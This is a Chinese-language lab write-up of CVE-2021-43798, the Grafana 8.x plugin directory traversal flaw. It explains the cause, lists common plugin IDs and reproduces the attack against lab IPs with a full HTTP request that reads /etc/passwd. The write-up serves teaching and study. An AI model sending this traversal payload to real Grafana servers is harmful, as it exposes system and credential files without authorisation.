CVE-2021-43798，Grafana 8.x 插件模块目录穿越漏洞

一、CVE-2021-43798，Grafana 8.x 插件模块目录穿越漏洞

!quote 参考文献 https://app.nextcyber.cn/courses/83/tasks/726

（一）漏洞条件

靶机配置：运行 Grafana 8.2.6 版本的服务器（该版本为漏洞影响范围内的典型版本，后续版本已修复此问题）。

漏洞触发模块：漏洞存在于 Grafana 的插件模块中。该模块的设计初衷是允许用户访问插件目录下的静态资源文件（如插件的 CSS、JS、图标等），以支持插件的正常加载与展示。

核心触发点：插件模块在处理用户请求的文件路径时，未对输入的文件名进行严格的合法性校验与过滤，未限制../（目录回溯符号）的使用，导致攻击者可通过拼接多个../实现目录穿越，跳出插件目录范围，访问服务器任意目录下的文件。

（二）漏洞原理

Grafana 8.2.6 版本的文件读取漏洞，本质是目录穿越漏洞（Path Traversal） 。其核心原理为：插件模块在接收用户访问插件目录文件的请求时，直接将用户输入的文件路径拼接至服务器本地的插件目录路径后进行文件读取操作，未对路径中的../符号进行过滤或解析。由于../在文件系统中代表 “返回上一级目录”，攻击者可通过在请求路径中构造多个../，逐步回溯至服务器的根目录（如 Linux 系统的/目录），再拼接目标敏感文件的路径（如/etc/passwd），最终实现对任意文件的读取。

例如，当攻击者发送请求/public/plugins/alertlist/../../../../../../../../../../../../../etc/passwd时，系统会按以下逻辑处理：

插件模块默认的基础路径为 Grafana 安装目录下的/public/plugins/；

拼接用户输入的alertlist/../../../../../../../../../../../../../etc/passwd后，完整路径变为/public/plugins/alertlist/../../../../../../../../../../../../../etc/passwd；

由于alertlist/../会抵消为上一级目录，经过多次../回溯后，路径最终简化为/etc/passwd，系统直接读取该文件并将内容返回给攻击者。

二、漏洞复现

!NOTE 靶场环境# 攻击机IP 10.132.1.111 # 靶机地址 10.22.202.151

（一）漏洞准备与探测

!NOTE 应用页面

利用这个漏洞前，我们需要先获取到一个已安装的插件id，比如常见的有：

alertlist
cloudwatch
dashlist
elasticsearch
graph
graphite
heatmap
influxdb
mysql
opentsdb
pluginlist
postgres
prometheus
stackdriver
table
text

（二）漏洞利用探测

GET /public/plugins/alertlist/../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 10.22.38.126:3000
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: redirect_to=%2F
Connection: keep-alive

!success 访问成功